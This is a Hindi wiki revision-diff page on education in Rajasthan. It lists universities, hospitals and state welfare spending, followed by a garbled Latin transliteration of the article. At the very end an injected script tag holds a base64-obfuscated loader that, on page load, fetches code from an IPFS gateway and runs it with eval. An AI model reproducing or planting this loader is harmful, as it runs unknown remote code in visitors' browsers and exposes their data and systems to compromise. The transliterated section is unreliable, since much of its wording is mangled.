Difference between revisions of "राजस्थान में शिक्षा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
[[चित्र:Mayo-College-Ajmer.jpg|thumb|250px|[[मेयो कॉलेज अजमेर|मेयो कॉलेज]], [[अजमेर]]]]
 
[[चित्र:Mayo-College-Ajmer.jpg|thumb|250px|[[मेयो कॉलेज अजमेर|मेयो कॉलेज]], [[अजमेर]]]]
*[[राजस्थान]] में अनेक शैक्षणिक संस्थान हैं।  
+
[[राजस्थान]] में अनेक शैक्षणिक संस्थान हैं। जिनमें राज्य द्वारा संचालित जयपुर, उदयपुर, जोधपुर व अजमेर विश्वविद्यालय; कोटा खुला विश्वविद्यालय; [[पिलानी]] में बिड़ला इंस्टिट्यूट ऑफ़ टेक्नोलॉजी एण्ड साइन्स शामिल हैं। यहाँ अनेक राजकीय अस्पताल और दवाख़ाने हैं। यहाँ कई आयुर्वेदिक, [[यूनानी चिकित्सा पद्धति|यूनानी]] (जड़ी-बूटियों पर आधारित चिकित्सा पद्धति) एवं [[होमियोपैथी]] संस्थान हैं। राज्य सरकार शिक्षा, मातृत्व व शिशु कल्याण, ग्रामीण व शहरी जलापूर्ति एवं पिछड़ों के कल्याण कार्यों पर भारी व्यय करती है।
*जिनमें राज्य द्वारा संचालित जयपुर, उदयपुर, जोधपुर व अजमेर विश्वविद्यालय; कोटा खुला विश्वविद्यालय; [[पिलानी]] में बिड़ला इंस्टिट्यूट ऑफ़ टेक्नोलॉजी एण्ड साइन्स शामिल हैं।  
+
==शिक्षण संस्थान==
*यहाँ अनेक राजकीय अस्पताल और दवाख़ाने हैं।  
+
*वनस्‍थली विद्यापीठ (मानद विश्‍वविद्यालय)
*यहाँ कई आयुर्वेदिक, [[यूनानी चिकित्सा पद्धति|यूनानी]] (जड़ी-बूटियों पर आधारित चिकित्सा पद्धति) एवं होमियोपैथी संस्थान हैं।  
+
*बिरला प्रौद्योगिकी और संस्‍थान संस्‍थान (मानद विश्‍वविद्यालय)
*राज्य सरकार शिक्षा, मातृत्व व शिशु कल्याण, ग्रामीण व शहरी जलापूर्ति एवं पिछड़ों के कल्याण कार्यों पर भारी व्यय करती है।
+
*आई. आई. एस. विश्‍वविद्यालय (मानद विश्‍वविद्यालय)
;शिक्षण संस्थान
+
*जैन विश्‍व भारती विश्‍वविद्यालय (मानद विश्‍वविद्यालय)
 
+
*एलएनएम सूचना प्रौद्योगिकी संस्‍थान (मानद विश्‍वविद्यालय)
*वनस्‍थली विद्यापीठ (मानद विश्‍वविद्यालय),
+
*मालवीया राष्‍ट्रीय प्रौद्योगिकी संस्‍थान (मानद विश्‍वविद्यालय)
*बिरला प्रौद्योगिकी और संस्‍थान संस्‍थान (मानद विश्‍वविद्यालय),
+
*मोहन लाल सुखादिया विश्‍वविद्यालय
*आई. आई. एस. विश्‍वविद्यालय (मानद विश्‍वविद्यालय),
+
*राष्‍ट्रीय विधि विश्‍वविद्यालय
*जैन विश्‍व भारती विश्‍वविद्यालय (मानद विश्‍वविद्यालय),
+
*राजस्‍थान कृषि विश्‍वविद्यालय
*एलएनएम सूचना प्रौद्योगिकी संस्‍थान (मानद विश्‍वविद्यालय),
+
*राजस्‍थान आर्युवैद विश्‍वविद्यालय
*मालवीया राष्‍ट्रीय प्रौद्योगिकी संस्‍थान (मानद विश्‍वविद्यालय),
+
*राजस्‍थान संस्‍कृत विश्‍वविद्यालय
*मोहन लाल सुखादिया विश्‍वविद्यालय,
+
*बीकानेर विश्‍वविद्यालय
*राष्‍ट्रीय विधि विश्‍वविद्यालय,
+
*कोटा विश्‍वविद्यालय
*राजस्‍थान कृषि विश्‍वविद्यालय,
 
*राजस्‍थान आर्युवैद विश्‍वविद्यालय,
 
*राजस्‍थान संस्‍कृत विश्‍वविद्यालय,
 
*बीकानेर विश्‍वविद्यालय,
 
*कोटा विश्‍वविद्यालय,
 
 
*राजस्‍थान विश्‍वविद्यालय।
 
*राजस्‍थान विश्‍वविद्यालय।
  
{{प्रचार}}
 
  
 
{{लेख प्रगति  
 
{{लेख प्रगति  
Line 31: Line 25:
 
|शोध=
 
|शोध=
 
}}
 
}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारत में शिक्षा}}
+
{{भारत में शिक्षा}}{{राजस्थान}}
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:भारत में शिक्षा]]
 
[[Category:भारत में शिक्षा]]

Latest revision as of 14:19, 30 March 2015

[[chitr:Mayo-College-Ajmer.jpg|thumb|250px|meyo k aaulej, ajamer]] rajasthan mean anek shaikshanik sansthan haian. jinamean rajy dvara sanchalit jayapur, udayapur, jodhapur v ajamer vishvavidyalay; kota khula vishvavidyalay; pilani mean bi dala ianstityoot aauf teknol aauji end sains shamil haian. yahaan anek rajakiy aspatal aur davakhane haian. yahaan kee ayurvedik, yoonani (j di-bootiyoan par adharit chikitsa paddhati) evan homiyopaithi sansthan haian. rajy sarakar shiksha, matritv v shishu kalyan, gramin v shahari jalapoorti evan pichh doan ke kalyan karyoan par bhari vyay karati hai.

shikshan sansthan

  • vanash‍thali vidyapith (manad vishh‍vavidyalay)
  • birala praudyogiki aur sansh‍than sansh‍than (manad vishh‍vavidyalay)
  • aee. aee. es. vishh‍vavidyalay (manad vishh‍vavidyalay)
  • jain vishh‍v bharati vishh‍vavidyalay (manad vishh‍vavidyalay)
  • elenem soochana praudyogiki sansh‍than (manad vishh‍vavidyalay)
  • malaviya rashh‍triy praudyogiki sansh‍than (manad vishh‍vavidyalay)
  • mohan lal sukhadiya vishh‍vavidyalay
  • rashh‍triy vidhi vishh‍vavidyalay
  • rajash‍than krishi vishh‍vavidyalay
  • rajash‍than aryuvaid vishh‍vavidyalay
  • rajash‍than sansh‍krit vishh‍vavidyalay
  • bikaner vishh‍vavidyalay
  • kota vishh‍vavidyalay
  • rajash‍than vishh‍vavidyalay.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>